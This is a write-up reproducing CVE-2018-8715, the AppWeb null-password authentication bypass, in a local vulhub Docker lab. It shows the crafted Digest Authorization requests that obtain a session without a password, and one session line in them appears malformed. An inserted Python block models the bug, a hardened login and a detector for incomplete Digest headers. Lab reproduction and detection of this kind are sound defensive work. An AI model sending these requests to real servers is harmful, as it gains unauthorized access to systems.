Vulnerability | CVE-2018-8715 (AppWeb authentication bypass)

Vulnerability overview
CVE ID: CVE-2018-8715
Affected versions: versions before 7.0.3
https://www.cvedetails.com/cve/CVE-2018-8715/
Cause of the vulnerability:
AppWeb supports configurable authentication, with three methods:

  1. basic: traditional HTTP Basic authentication
  2. digest: an improved form of HTTP Basic authentication; after a successful login a Cookie keeps the session state, so the Authorization header does not need to be sent again
  3. form: form-based authentication
In versions before 7.0.3, for the digest and form methods, if the password supplied by the user is null (that is, no password parameter is sent at all), a logic error causes AppWeb to treat the login as successful and return a session.
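As an added illustration, not AppWeb's source code and not part of the original post, the Python below models the logic error described above and shows the two defensive checks a practitioner would want: a hardened login routine that treats a missing or empty password as a failed login rather than a skipped check, and a header-level check that flags Digest Authorization headers carrying no credential proof (no response field), which is what an incomplete header like "Digest username=admin" looks like. The user store, passwords and request samples are constructed for the example.

```python
"""Defensive checks for the null-password failure mode of CVE-2018-8715.

Illustrative code only (not AppWeb's implementation): it models the
described logic error, the hardened check, and a detector for Digest
Authorization headers that omit the fields a real login must carry.
"""
import hashlib
import hmac
import re
from typing import Dict, List, Optional

# Parameters a complete RFC 7616 Digest credential must carry.
REQUIRED_DIGEST_FIELDS = ("username", "realm", "nonce", "uri", "response")

# Matches  key=value  or  key="quoted value"  inside the Digest parameter list.
_DIGEST_PARAM = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|([^,\s]*))')


def parse_digest_header(value: str) -> Optional[Dict[str, str]]:
    """Parse 'Digest k=v, k="v", ...' into a dict; None if not a Digest header."""
    scheme, _, params = value.strip().partition(" ")
    if scheme.lower() != "digest":
        return None
    parsed = {}
    for m in _DIGEST_PARAM.finditer(params):
        parsed[m.group(1).lower()] = m.group(2) if m.group(2) is not None else m.group(3)
    return parsed


def missing_digest_fields(value: str) -> List[str]:
    """Return the required Digest parameters that are absent or empty."""
    params = parse_digest_header(value)
    if params is None:
        return list(REQUIRED_DIGEST_FIELDS)
    return [f for f in REQUIRED_DIGEST_FIELDS if not params.get(f)]


# Hypothetical user store (constructed): username -> sha256(password) hex.
USERS = {"admin": hashlib.sha256(b"correct horse").hexdigest()}


def _password_matches(password: str, stored_hex: str) -> bool:
    digest = hashlib.sha256(password.encode()).hexdigest()
    return hmac.compare_digest(digest, stored_hex)


def login_vulnerable(username: str, password: Optional[str]) -> bool:
    """Models the logic error: a null password skips verification entirely."""
    stored = USERS.get(username)
    if stored is None:
        return False
    if password is None:  # BUG: "nothing to verify" is treated as success
        return True
    return _password_matches(password, stored)


def login_hardened(username: str, password: Optional[str]) -> bool:
    """Fixed version: a missing or empty password is a failed login, never a skip."""
    stored = USERS.get(username)
    if stored is None or not password:
        return False
    return _password_matches(password, stored)


def flag_incomplete_digest(requests: List[Dict[str, str]]) -> List[str]:
    """Return ids of requests whose Digest header lacks a credential proof.

    Basic or absent Authorization headers are not this check's concern and
    are left alone; only malformed Digest credentials are reported.
    """
    flagged = []
    for req in requests:
        header = req.get("authorization", "")
        if header.lower().startswith("digest") and missing_digest_fields(header):
            flagged.append(req["id"])
    return flagged


# Constructed sample requests (not captured traffic).
SAMPLE_REQUESTS = [
    {"id": "req-1", "authorization": "Digest username=admin"},
    {"id": "req-2", "authorization": 'Digest username="admin", realm="app", '
                                     'nonce="n1", uri="/", response="0123abcd"'},
    {"id": "req-3", "authorization": "Basic YWRtaW46cGFzcw=="},
    {"id": "req-4"},
]

if __name__ == "__main__":
    print("vulnerable login with null password:", login_vulnerable("admin", None))
    print("hardened login with null password:", login_hardened("admin", None))
    print("flagged requests:", flag_incomplete_digest(SAMPLE_REQUESTS))
```

The header check is a useful proxy/WAF or log rule on its own: a legitimate client never sends a Digest credential without a response value, so such a header is worth logging even on a patched server.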
Reproduction
As root: cd /home/guiltyfet/vulhub/appweb/CVE-2018-8715
Start the environment
┌──(rootguiltyfet)-[/home/guiltyfet/vulhub/appweb/CVE-2018-8715]
└─# docker-compose up -d
Creating network "cve-2018-8715_default" with the default driver
Pulling web (vulhub/appweb:7.0.1)...
7.0.1: Pulling from vulhub/appweb
419e7ae5bb1e: Pull complete
848839e0cd3b: Pull complete
de30e8b35015: Pull complete
2e66baab3c26: Pull complete
9a1adbcb76ed: Pull complete
Digest: sha256:f7dbbe93bb427774c89d55e9dca3343a15c906ef82386b693edaca7c0c922330
Status: Downloaded newer image for vulhub/appweb:7.0.1
Creating cve-2018-8715_web_1 ... done

Visit the local host IP on port 8080.
Change the proxy and Burp port; otherwise Burp cannot capture the traffic because the port is in use.

Construct the request headers
GET / HTTP/1.1
Host: 172.17.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,*/*; q=0.8
Accept-Language: en-US,en; q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Digest username=admin

Construct the request headers again
POST http://172.17.0.1:8080/ HTTP/1.1
Host: 172.17.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,*/*; q=0.8
Accept-Language: en-US,en; q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
-http-session-=1::http.session::76bb9689db658ca88d054e65eaa89351
Authorization: Digest username=admin
Content-Length: 14

username=admin
Shut down the container
docker-compose down
